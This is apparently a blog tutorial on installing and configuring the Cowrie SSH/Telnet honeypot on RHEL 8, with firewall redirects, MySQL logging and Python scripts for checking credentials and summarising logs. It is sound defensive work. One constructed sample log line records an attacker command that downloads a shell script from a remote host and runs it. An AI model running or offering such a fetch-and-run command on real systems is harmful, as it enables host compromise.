Deploying an SSH honeypot (Cowrie) on RHEL 8

Introduction to the Cowrie honeypot

Project address: https://github.com/cowrie/cowrie

Cowrie is a medium-interaction SSH and Telnet honeypot. It records the dictionaries attackers use for brute forcing, the commands they type after logging in, and the characteristics (URL, hash, contents) of any files they upload or download:

  1. A fake file system that supports adding and removing files; the complete fake file system resembles a Debian 5.0 installation.
  2. Fake file contents can be added so that an attacker can cat files such as /etc/passwd; only a minimal set of file contents is included.
  3. Session logs are stored in a UML-compatible format for easy replay (bin/playlog).
  4. Cowrie saves files downloaded with wget/curl, or uploaded with SFTP and scp, for later inspection.

Install and run Cowrie

Reference: http://localnetwork.cn/project-3/doc-47/


Install dependency packages

# Install build and runtime dependencies
yum install -y git gcc bzip2-devel libffi-devel vim net-tools

Create the cowrie user

# Create an unprivileged cowrie user (no password is set, so it cannot log in interactively)
useradd cowrie

Download the Cowrie source code

# Enter the /opt directory
cd /opt

# Clone the Cowrie source
git clone https://github.com/cowrie/cowrie.git

# Enter the Cowrie source directory
cd /opt/cowrie/

Create a Python 3 virtual environment

Cowrie requires Python 3.7 or later. Note that the default python3 package on RHEL 8 is Python 3.6; install a newer interpreter from AppStream (for example the python39 package) and use that interpreter for the python3 -m venv step below. The two virtualenv installs are optional, since the venv module used here ships with Python 3 itself.

# Optional: RHEL package for virtualenv
yum install -y python3-virtualenv

# Optional: pip package for virtualenv
pip3 install virtualenv

# Enter the Cowrie directory
cd /opt/cowrie/

# Create the virtual environment
python3 -m venv cowrie-env

# Activate the virtual Python environment
source cowrie-env/bin/activate

Install the Python dependencies with pip

Run the following inside the activated (cowrie-env) Python 3.7+ virtual environment.

# Enter the Cowrie source directory
cd /opt/cowrie/

# Upgrade setuptools and the pip package manager
pip3 install -U setuptools
pip3 install -U pip

# Install helper packages
pip3 install six packaging appdirs

# Install the project's Python dependencies
pip3 install -U -r requirements.txt

Create the configuration file

Cowrie reads etc/cowrie.cfg.dist first and then etc/cowrie.cfg, whose values override it. Copying the whole template, as below, works; a cowrie.cfg that holds only the settings you change is easier to carry across upgrades.

# Enter the configuration template directory
cd /opt/cowrie/etc/

# Copy the configuration template
cp cowrie.cfg.dist cowrie.cfg

# Make the cowrie user the owner of the tree (it must be able to write var/ at run time)
chown -R cowrie /opt/cowrie/

Create the simulated leaked SSH credential file

# Edit the file of simulated leaked SSH credentials (path relative to /opt/cowrie)
vim etc/userdb.txt

List the credentials you suspect have leaked, one per line in the form username:x:password (the middle field is ignored). Only these combinations can log in to the honeypot; every other attempt is rejected and logged. A password of * accepts anything, a ! prefix explicitly denies a password, and rules are evaluated in file order. If etc/userdb.txt does not exist, Cowrie falls back to a built-in database that accepts most root passwords, so create the file deliberately.

root:x:suspected-leaked-password-1
root:x:suspected-leaked-password-2
admin:x:suspected-leaked-password-3
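To check what a given userdb.txt will accept before exposing the honeypot, the following Python script (an added example, not Cowrie's own code) re-implements the matching rules described above in simplified form: literal values, the * wildcard, /regex/ patterns with an optional i flag, a ! prefix that denies, and first-match-wins in file order. The SAMPLE_USERDB content is constructed for the example.

```python
import re

# Constructed sample etc/userdb.txt (not from the page). Each line is
# username:x:password; the middle field is ignored.
#   literal value        accepted as-is
#   !value               explicitly denied (reject guesses that are "too obvious")
#   *                    matches anything
#   /regex/ or /regex/i  regular expression, optionally case-insensitive
SAMPLE_USERDB = """\
# lines starting with # are comments
root:x:!root
root:x:!123456
root:x:/^toor(123)?$/
admin:x:admin123
*:x:/^secret[0-9]+$/i
"""


def _re_or_bytes(rule: bytes):
    """Compile a /.../ or /.../i rule to a regex; any other rule stays a literal bytes value."""
    m = re.match(rb"/(.+)/(i)?$", rule)
    if m:
        return re.compile(m.group(1), re.IGNORECASE if m.group(2) else 0)
    return rule


def _match(rule, value: bytes) -> bool:
    """A literal rule matches on equality or when it is the '*' wildcard; a regex uses search()."""
    if isinstance(rule, bytes):
        return rule == b"*" or rule == value
    return bool(rule.search(value))


def load_userdb(text: str):
    """Parse userdb lines into (user_rule, password_rule, allow) triples in file order."""
    rules = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 3:
            continue  # malformed line, silently ignored
        user = parts[0].encode("utf-8")
        passwd = parts[2].strip().encode("utf-8")
        allow = True
        if passwd.startswith(b"!"):
            allow = False
            passwd = passwd[1:]
        rules.append((_re_or_bytes(user), _re_or_bytes(passwd), allow))
    return rules


def check_login(rules, username: str, password: str) -> bool:
    """The first rule whose user and password patterns both match decides; no match means deny."""
    u, p = username.encode("utf-8"), password.encode("utf-8")
    for user_rule, pass_rule, allow in rules:
        if _match(user_rule, u) and _match(pass_rule, p):
            return allow
    return False


if __name__ == "__main__":
    rules = load_userdb(SAMPLE_USERDB)
    for user, pw in [("root", "root"), ("root", "toor"), ("root", "secret7"),
                     ("admin", "admin123"), ("guest", "SECRET42"), ("guest", "secret")]:
        verdict = "accept" if check_login(rules, user, pw) else "reject"
        print(f"{user}/{pw}: {verdict}")
```

Feed it your real file with load_userdb(open("/opt/cowrie/etc/userdb.txt").read()). Note how the trailing *:x:/^secret[0-9]+$/i line also applies to root, because the earlier root rules only match their own passwords; a wildcard line therefore belongs after every rule it must not override.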

Edit the configuration file

# Edit the configuration file
vim cowrie.cfg

By default Cowrie listens for SSH on port 2222 and, once enabled, for Telnet on port 2223, because it runs as an unprivileged user that cannot bind the privileged ports. Connections to ports 22 and 23 are therefore redirected to 2222 and 2223 by the firewall rules in the next section. Enable Telnet as follows; listen_endpoints is the current setting and takes precedence, listen_port is the older form.

[telnet]
enabled = true

listen_port = 2223
listen_endpoints = tcp:2223:interface=0.0.0.0



Configure the firewall

Before redirecting port 22 to the honeypot, move the real sshd to a different port (Port directive in /etc/ssh/sshd_config, plus opening that port in firewalld and, with SELinux enforcing, allowing it with semanage port); otherwise the forward rule hides your own management SSH. The sshd restart at the end applies that change.

firewalld configuration

# Open the honeypot's ports 2222 and 2223
firewall-cmd --add-port=2222/tcp --permanent
firewall-cmd --add-port=2223/tcp --permanent

# Enable masquerading (source NAT), which firewalld's port forwarding relies on
firewall-cmd --zone=public --add-masquerade --permanent

# Forward port 22 to 2222
firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent

# Forward port 23 to 2223
firewall-cmd --zone=public --add-forward-port=port=23:proto=tcp:toport=2223 --permanent

# Apply the new rules
firewall-cmd --reload

# Restart sshd so it picks up its new listening port
systemctl restart sshd

iptables configuration

These rules are not persistent across reboots unless saved (for example with the iptables-services package).

# Allow new TCP connections to port 80 (unrelated to the honeypot; omit unless this host also serves HTTP)
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT

# Allow new TCP connections to the honeypot ports. The REDIRECT rules below rewrite the
# destination port in nat/PREROUTING, so by the time a packet reaches filter/INPUT its
# port is already 2222 or 2223; an INPUT rule for --dport 22 would not match it.
iptables -I INPUT -p tcp --dport 2222 -m state --state NEW -j ACCEPT
iptables -I INPUT -p tcp --dport 2223 -m state --state NEW -j ACCEPT

# Redirect TCP port 22 to the honeypot's port 2222
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

# Redirect TCP port 23 to the honeypot's port 2223
iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223

Send Cowrie output to a MySQL database (optional)

https://cowrie.readthedocs.io/en/latest/sql/README.html
Prerequisite: an existing MySQL or MariaDB server.

Install the MySQL client library

Related: Install MariaDB; install the MySQL server

# Install the MySQL client library and headers, plus the Python headers needed to build the driver below
# (use the -devel package that matches the interpreter of your virtual environment)
yum install -y mysql-devel python3-devel

Run the following inside the (cowrie-env) Python virtual environment.

# Install the MySQL driver. mysqlclient is the Python 3 port of MySQLdb; the old mysql-python
# package is Python 2 only, and pip has no -y option.
pip install mysqlclient

Create the database

-- Create the cowrie database
create database cowrie;

-- Grant user "cowrie" full privileges on the cowrie database from "localhost" and set its password to "123".
-- Use a strong password in practice. This one-statement form works on MariaDB and MySQL 5.x; MySQL 8
-- removed IDENTIFIED BY from GRANT, so there run CREATE USER 'cowrie'@'localhost' IDENTIFIED BY '...';
-- first and then the GRANT without the IDENTIFIED BY clause.
grant all on cowrie.* to cowrie@localhost identified by '123';

Import the schema into the database

# Enter Cowrie's sql directory (the source command below resolves mysql.sql relative to it)
cd /opt/cowrie/docs/sql

# Log in to the database (shell)
mysql -ucowrie -p

-- Switch to the cowrie database
use cowrie;

-- Import the schema
source mysql.sql

Configure the honeypot's database connection

cowrie.cfg now holds a database password, so keep it readable only by the cowrie user.

vim /opt/cowrie/etc/cowrie.cfg

[output_mysql]
enabled = true
host = localhost
database = cowrie
username = cowrie
password = 123
port = 3306

Start the honeypot

# Switch to the cowrie user (never run the honeypot as root)
su - cowrie

# Activate the virtual Python environment (su - lands in cowrie's home directory, so use the absolute path)
source /opt/cowrie/cowrie-env/bin/activate

# Change to the bin directory
cd /opt/cowrie/bin

# Start the honeypot
/opt/cowrie/bin/cowrie start

# Check the honeypot's status
/opt/cowrie/bin/cowrie status

# Stop the honeypot
/opt/cowrie/bin/cowrie stop

View attacker information and attack methods

# Log in to MySQL and query the tables created by mysql.sql (sessions, auth, input, downloads)
mysql -ucowrie -p

View the logs

The paths below are relative to /opt/cowrie. cowrie.json is rotated daily; older days are kept as cowrie.json.YYYY-MM-DD next to it.

# Plain-text log
tail ./var/log/cowrie/cowrie.log

# JSON log (one event per line)
tail ./var/log/cowrie/cowrie.json

# Failed logins
grep cowrie.login.failed ./var/log/cowrie/cowrie.json

# Successful logins
grep cowrie.login.success ./var/log/cowrie/cowrie.json

# Commands entered after logging in to the honeypot
grep cowrie.command.input ./var/log/cowrie/cowrie.json
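The grep commands above answer one question at a time. The following Python script, an added example rather than part of the original post or of Cowrie, parses cowrie.json line by line and aggregates login attempts per source IP, the most-tried credentials, successful logins, the commands typed in each session and downloaded files. The log lines in SAMPLE_JSON are constructed for the example; their field names follow the event types named above. The load_logs helper and its default path (relative to /opt/cowrie) are assumptions for reading the live and rotated files.

```python
import glob
import json
from collections import Counter, defaultdict

# Constructed sample of cowrie.json lines (not real honeypot output).
SAMPLE_JSON = r"""
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.5","src_port":51234,"dst_port":2222,"session":"a1b2c3","protocol":"ssh","timestamp":"2023-08-01T10:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:01.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:02.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:03.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:04.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh; sh /tmp/x.sh","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:05.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://198.51.100.9/x.sh","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","src_ip":"203.0.113.5","session":"a1b2c3","timestamp":"2023-08-01T10:00:06.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"198.51.100.77","session":"d4e5f6","timestamp":"2023-08-01T10:05:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.77","session":"d4e5f6","timestamp":"2023-08-01T10:05:01.000000Z"}
not json: a truncated line, skipped by the parser
"""


def parse_events(text: str):
    """Parse one JSON object per line; lines that are not valid JSON are skipped."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def load_logs(pattern: str = "var/log/cowrie/cowrie.json*"):
    """Read the live cowrie.json plus rotated cowrie.json.YYYY-MM-DD files (run from /opt/cowrie)."""
    chunks = []
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8") as fh:
            chunks.append(fh.read())
    return parse_events("\n".join(chunks))


def summarize(events):
    """Aggregate the fields an analyst looks at first."""
    attempts_by_ip = Counter()   # login attempts (failed + successful) per source IP
    credentials = Counter()      # (username, password) pairs tried
    successes = []               # (src_ip, username, password) that got in
    commands = defaultdict(list) # session id -> commands typed, in order
    downloads = []               # (url, sha256) of files the attacker fetched
    for ev in events:
        kind = ev.get("eventid", "")
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            attempts_by_ip[ev["src_ip"]] += 1
            credentials[(ev["username"], ev["password"])] += 1
            if kind == "cowrie.login.success":
                successes.append((ev["src_ip"], ev["username"], ev["password"]))
        elif kind == "cowrie.command.input":
            commands[ev["session"]].append(ev["input"])
        elif kind == "cowrie.session.file_download":
            downloads.append((ev.get("url"), ev.get("shasum")))
    return {
        "attempts_by_ip": attempts_by_ip,
        "credentials": credentials,
        "successes": successes,
        "commands": dict(commands),
        "downloads": downloads,
    }


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_JSON))
    print("attempts per IP:", summary["attempts_by_ip"].most_common())
    print("top credentials:", summary["credentials"].most_common(3))
    print("successful logins:", summary["successes"])
    for session, cmds in summary["commands"].items():
        print(f"session {session}:", cmds)
    print("downloads:", summary["downloads"])
```

Replace parse_events(SAMPLE_JSON) with load_logs() to run it over the real log directory; the sha256 in each download record is the name of the captured file under var/lib/cowrie/downloads, so it can be pulled straight out for analysis.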


Source: blog.csdn.net/omaidb/article/details/132063792